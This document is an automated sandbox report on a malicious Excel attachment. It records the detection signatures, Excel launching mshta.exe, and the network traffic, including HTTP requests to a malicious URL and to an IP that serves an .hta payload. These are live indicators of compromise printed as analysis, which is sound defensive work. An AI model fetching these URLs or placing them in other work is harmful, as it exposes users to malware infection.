Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_948575494759.xls

Overview

General Information

Sample name:Order_948575494759.xls
Analysis ID:1577527
MD5:6bcc53dc843155e886f469778b4216f1
SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 3420 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 3312 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 5092 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 1608 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 3420, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 3420, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3312, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.173.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.25, SourceIsIpv6: false, SourcePort: 49728
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.25, DestinationIsIpv6: false, DestinationPort: 49728, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 170.82.173.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusAvira URL Cloud: Label: malware
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YAvira URL Cloud: Label: malware
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: Order_948575494759.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49728 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49728
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 173.214.167.74:80
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: Order_948575494759.xls, 21830000.0.drString found in binary or memory: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y
Source: Primary1734530844238518000_E8DEA6AB-5D5D-4A6F-A0CD-558F53FDD9F4.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728

System Summary

barindex
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: ~DFCC8F340C1AB5DCC3.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DFB5CCA57CA447654A.TMP.0.drOLE: Microsoft Excel 2007+
Source: 21830000.0.drOLE: Microsoft Excel 2007+
Source: 21830000.0.drOLE: Microsoft Excel 2007+
Source: 21830000.0.drOLE: Microsoft Excel 2007+
Source: 21830000.0.drOLE: Microsoft Excel 2007+
Source: 21830000.0.drOLE: Microsoft Excel 2007+
Source: ~DFCA37DEB788128279.TMP.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].htaJump to behavior
Source: Order_948575494759.xlsOLE indicator, VBA macros: true
Source: 21830000.0.drOLE indicator, VBA macros: true
Source: Order_948575494759.xlsStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: 21830000.0.drStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: ~DFCC8F340C1AB5DCC3.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFB5CCA57CA447654A.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFCA37DEB788128279.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/44@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9578EF58.emfJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E8DEA6AB-5D5D-4A6F-A0CD-558F53FDD9F4} - OProcSessId.datJump to behavior
Source: Order_948575494759.xlsOLE indicator, Workbook stream: true
Source: 21830000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Order_948575494759.xlsStatic file information: File size 1124352 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DFCC8F340C1AB5DCC3.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Order_948575494759.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
